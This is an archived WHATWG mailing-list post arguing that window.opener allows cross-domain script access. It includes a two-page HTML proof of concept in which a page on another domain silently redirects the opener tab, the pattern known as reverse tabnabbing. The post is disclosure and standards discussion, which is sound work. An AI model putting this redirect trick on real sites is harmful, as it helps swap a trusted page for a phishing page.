W3C home > Mailing lists > Public > whatwg@whatwg.org > December 2016

Re: [whatwg] window.opener security issues (Was: WhatWG is broken)

From: Michael A. Peters <mpeters@domblogger.net>
Date: Wed, 30 Nov 2016 19:33:48 -0800
To: whatwg@lists.whatwg.org
Message-ID: <176b9237-4c02-4c5a-1efb-a8b9d66d9e17@domblogger.net>
On 11/30/2016 06:21 PM, Michael A. Peters wrote:
> On 11/30/2016 05:23 PM, Ian Hickson wrote:
>> On Wed, Nov 30, 2016 at 4:49 PM Michael A. Peters
>> <mpeters@domblogger.net>
>> wrote:
>>
>>>
>>> Right now the specification for window.opener() is seriously insecure,
>>> allowing for cross-domain script access by default.
>>>
>>
>> I believe that's a bit of an overstatement. There are certainly risks
>> involved in window.opener (they're briefly discussed in the spec itself),
>> but it doesn't remove the origin checks.
>>
>>
>
> Actually it does. Site A can link to Site B on a completely different
> domain and JavaScript on Site B has access to the window for Site A and
> can change the URL and other things.
>

Here is easy demo showing the blatant cross-domain scripting vulnerability.

<!-- put this page as a.html on foo.com -->
<html>
   <head>
     <title>Test target link</title>
   </head>
   <body>
     <p><a href="https://bar.net/b.html" target="_blank">link to 
different domain</a></p>
   </body>
</html>

<!-- put this page as b.html on bar.net -->
<html>
   <head>
     <title>Test window.opener</title>
     <script type="text/javascript" >
if (window.opener && !window.opener.closed)
   opener.location = 'http://www.example.org/'
     </script>
   </head>
   <body>
     <p>The page on foo.com will have changed to http://www.example.org/ 
because this page had script access to that window. Obvious very serious 
phishing concern, and probably other concerns</p>
   </body>
</html>
Received on Thursday, 1 December 2016 03:34:21 UTC

This archive was generated by hypermail 2.3.1 : Thursday, 1 December 2016 03:34:21 UTC